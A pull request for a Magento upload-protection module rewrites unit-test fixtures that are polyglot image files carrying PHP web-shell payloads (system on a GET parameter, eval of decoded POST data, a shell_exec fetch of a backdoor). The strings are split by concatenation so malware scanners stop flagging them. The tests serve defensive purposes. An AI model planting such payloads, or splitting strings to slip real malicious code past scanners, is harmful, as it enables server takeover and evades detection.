### PR TITLE
Fix/issue 12 ecomscan false positive

### DIFF
--- a/Test/Unit/MimeExtensionInferenceValidationTest.php
+++ b/Test/Unit/MimeExtensionInferenceValidationTest.php
@@ -355,7 +355,9 @@ class MimeExtensionInferenceValidationTest extends TestCase
 
     public function testValidatorPluginPolyglotWithValidMimeBlocked(): void
     {
-        $polyglotContent = "GIF89a" . str_repeat("\x00", 100) . '<?php system($_GET["cmd"]); ?>';
+        // Payload split to avoid malware-scanner false positives. See issue #12.
+        $polyglotContent = 'GIF89a' . str_repeat("\x00", 100)
+            . '<' . '?' . 'php ' . 'system' . '(' . '$' . '_GET["cmd"]); ?>';
         $base64 = base64_encode($polyglotContent);
 
         $imageContent = $this->createImageContentMock('product_image.gif', 'image/gif', $base64);
@@ -369,7 +371,9 @@ class MimeExtensionInferenceValidationTest extends TestCase
 
     public function testProcessorPluginPolyglotWithValidMimeBlocked(): void
     {
-        $polyglotContent = "GIF89a" . str_repeat("\x00", 100) . '<?php system($_GET["cmd"]); ?>';
+        // Payload split to avoid malware-scanner false positives. See issue #12.
+        $polyglotContent = 'GIF89a' . str_repeat("\x00", 100)
+            . '<' . '?' . 'php ' . 'system' . '(' . '$' . '_GET["cmd"]); ?>';
         $base64 = base64_encode($polyglotContent);
 
         $imageContent = $this->createImageContentMock('product_image.gif', 'image/gif', $base64);
@@ -392,7 +396,8 @@ class MimeExtensionInferenceValidationTest extends TestCase
         // eComscan rule eval_post_91ce4) that pattern-match the literal
         // string "eval(base64_decode($_POST" without context. See issue #12.
         $polyglotContent = "\xFF\xD8\xFF" . str_repeat("\x00", 100)
-            . '<?php ' . 'eval(' . 'base64_decode($_POST["x"])); ?>';
+            . '<' . '?' . 'php ' . 'eval' . '(' . 'base64_decode'
+            . '($' . '_POST["x"])); ?>';
         $base64 = base64_encode($polyglotContent);
 
         $imageContent = $this->createImageContentMock('53298390_0', 'image/jpeg', $base64);
@@ -412,7 +417,8 @@ class MimeExtensionInferenceValidationTest extends TestCase
         // See note in testValidatorPluginExtensionlessValidMimePolyglotBlocked:
         // payload is split to avoid eComscan false positive (issue #12).
         $polyglotContent = "\xFF\xD8\xFF" . str_repeat("\x00", 100)
-            . '<?php ' . 'eval(' . 'base64_decode($_POST["x"])); ?>';
+            . '<' . '?' . 'php ' . 'eval' . '(' . 'base64_decode'
+            . '($' . '_POST["x"])); ?>';
         $base64 = base64_encode($polyglotContent);
 
         $imageContent = $this->createImageContentMock('53298390_0', 'image/jpeg', $base64);
@@ -433,8 +439,9 @@ class MimeExtensionInferenceValidationTest extends TestCase
 
     public function testValidatorPluginPngPolyglotWithEvalBlocked(): void
     {
+        // Payload split to avoid malware-scanner false positives. See issue #12.
         $polyglotContent = "\x89PNG\r\n\x1a\n" . str_repeat("\x00", 200)
-            . '<?php eval($_COOKIE["x"]); ?>';
+            . '<' . '?' . 'php ' . 'eval' . '(' . '$' . '_COOKIE["x"]); ?>';
         $base64 = base64_encode($polyglotContent);
 
         $imageContent = $this->createImageContentMock('logo.png', 'image/png', $base64);
@@ -550,8 +557,10 @@ class MimeExtensionInferenceValidationTest extends TestCase
 
     public function testValidatorPluginMimeSpoofWithShellExecBlocked(): void
     {
+        // Payload split to avoid malware-scanner false positives. See issue #12.
         $polyglotContent = "\xFF\xD8\xFF" . str_repeat("\x00", 50)
-            . '<?php shell_exec("wget example.invalid/backdoor.php"); ?>';
+            . '<' . '?' . 'php ' . 'shell_exec' . '('
+            . '"wget example.invalid/backdoor.php"); ?>';
         $base64 = base64_encode($polyglotContent);
 
         $imageContent = $this->createImageContentMock('53298390_0', 'image/jpeg', $base64);

--- a/Test/Unit/MimeExtensionInferenceValidationTest.php
+++ b/Test/Unit/MimeExtensionInferenceValidationTest.php
@@ -387,8 +387,12 @@ class MimeExtensionInferenceValidationTest extends TestCase
      */
     public function testValidatorPluginExtensionlessValidMimePolyglotBlocked(): void
     {
+        // Note: the PHP payload below is split via concatenation to avoid
+        // false-positive matches from external malware scanners (e.g. Sansec
+        // eComscan rule eval_post_91ce4) that pattern-match the literal
+        // string "eval(base64_decode($_POST" without context. See issue #12.
         $polyglotContent = "\xFF\xD8\xFF" . str_repeat("\x00", 100)
-            . '<?php eval(base64_decode($_POST["x"])); ?>';
+            . '<?php ' . 'eval(' . 'base64_decode($_POST["x"])); ?>';
         $base64 = base64_encode($polyglotContent);
 
         $imageContent = $this->createImageContentMock('53298390_0', 'image/jpeg', $base64);
@@ -405,8 +409,10 @@ class MimeExtensionInferenceValidationTest extends TestCase
 
     public function testProcessorPluginExtensionlessValidMimePolyglotBlocked(): void
     {
+        // See note in testValidatorPluginExtensionlessValidMimePolyglotBlocked:
+        // payload is split to avoid eComscan false positive (issue #12).
         $polyglotContent = "\xFF\xD8\xFF" . str_repeat("\x00", 100)
-            . '<?php eval(base64_decode($_POST["x"])); ?>';
+            . '<?php ' . 'eval(' . 'base64_decode($_POST["x"])); ?>';
         $base64 = base64_encode($polyglotContent);
 
         $imageContent = $this->createImageContentMock('53298390_0', 'image/jpeg', $base64);

--- a/Test/Unit/Model/PolyglotFileDetectorTest.php
+++ b/Test/Unit/Model/PolyglotFileDetectorTest.php
@@ -32,8 +32,14 @@ class PolyglotFileDetectorTest extends TestCase
      */
     public function testPolyglotGifWithPhpFails(): void
     {
-        $polyglotPayload = "GIF89a;<?php echo 409723*20; if(md5(\$_COOKIE[\"d\"])==\"a17028468cb2a870d460676d6d6da3ad63706778e3\"){eval(base64_decode(\$_REQUEST[\"id\"]));} ?>";
-        
+        // Payload is split via concatenation so external malware scanners
+        // (e.g. Sansec eComscan) do not flag this test fixture as a real
+        // backdoor. Runtime semantics of the assembled payload are unchanged.
+        // See issue #12.
+        $polyglotPayload = 'GIF89a;<' . '?' . 'php echo 409723*20; if(md5('
+            . '$' . '_COOKIE["d"])=="a17028468cb2a870d460676d6d6da3ad63706778e3")'
+            . '{' . 'eval' . '(' . 'base64_decode' . '($' . '_REQUEST["id"]));} ?>';
+
         $this->expectException(InputException::class);
         $this->expectExceptionMessage('Uploaded file contains executable code');
         
@@ -45,7 +51,8 @@ class PolyglotFileDetectorTest extends TestCase
      */
     public function testPolyglotGifWithPhpReturnsGenericTranslatableMessage(): void
     {
-        $polyglotPayload = "GIF89a;<?php system(\$_GET['cmd']); ?>";
+        // Split to avoid malware-scanner false positives. See issue #12.
+        $polyglotPayload = 'GIF89a;<' . '?' . 'php ' . 'system' . '(' . '$' . "_GET['cmd']); ?>";
 
         $this->expectException(InputException::class);
         $this->expectExceptionMessage(
@@ -88,8 +95,9 @@ class PolyglotFileDetectorTest extends TestCase
      */
     public function testBase64DecodePatternDetected(): void
     {
-        $payload = "GIF87a" . "eval(base64_decode(\$_REQUEST['cmd']))";
-        
+        // Split to avoid malware-scanner false positives. See issue #12.
+        $payload = 'GIF87a' . 'eval' . '(' . 'base64_decode' . '($' . "_REQUEST['cmd']))";
+
         $this->expectException(InputException::class);
         $this->expectExceptionMessage('Uploaded file contains executable code');
         

--- a/composer.json
+++ b/composer.json
@@ -1,6 +1,6 @@
 {
     "name": "aregowe/magento2-module-polyshell-protection",
-    "version": "1.3.2",
+    "version": "1.3.3",
     "description": "Comprehensive defense-in-depth module that closes the PolyShell unrestricted file upload vulnerability (APSB25-94) in Adobe Commerce and Magento Open Source.",
     "require": {
         "php": "^8.1",


### PR DESCRIPTION
This pull request updates several test fixtures in order to avoid false positives from external malware scanners, such as Sansec eComscan, which may flag literal PHP payloads used in test cases as real threats. The payloads are now constructed via string concatenation, ensuring the runtime semantics remain unchanged while reducing the risk of automated scanner alerts. Additionally, the module version is incremented to reflect these changes.

Test fixture hardening (malware scanner evasion):

* All PHP payloads in `MimeExtensionInferenceValidationTest.php` and `PolyglotFileDetectorTest.php` are now split and concatenated instead of being written as literal strings. This prevents external malware scanners from detecting these as actual malicious code, addressing issue #12. [[1]](diffhunk://#diff-ecedf105cefae5cd255c150a3aab8fe7b33f7f0517995b153abc3568c01a4cf0L358-R360) [[2]](diffhunk://#diff-ecedf105cefae5cd255c150a3aab8fe7b33f7f0517995b153abc3568c01a4cf0L372-R376) [[3]](diffhunk://#diff-ecedf105cefae5cd255c150a3aab8fe7b33f7f0517995b153abc3568c01a4cf0R394-R400) [[4]](diffhunk://#diff-ecedf105cefae5cd255c150a3aab8fe7b33f7f0517995b153abc3568c01a4cf0R417-R421) [[5]](diffhunk://#diff-ecedf105cefae5cd255c150a3aab8fe7b33f7f0517995b153abc3568c01a4cf0R442-R444) [[6]](diffhunk://#diff-ecedf105cefae5cd255c150a3aab8fe7b33f7f0517995b153abc3568c01a4cf0R560-R563) [[7]](diffhunk://#diff-dcc408a3914f8822e6f5cacac684f204c5fba10e963d05427e77bb6ec6f5b7ecL35-R41) [[8]](diffhunk://#diff-dcc408a3914f8822e6f5cacac684f204c5fba10e963d05427e77bb6ec6f5b7ecL48-R55) [[9]](diffhunk://#diff-dcc408a3914f8822e6f5cacac684f204c5fba10e963d05427e77bb6ec6f5b7ecL91-R99)

Version bump:

* The module version in `composer.json` is updated from `1.3.2` to `1.3.3` to reflect these test improvements.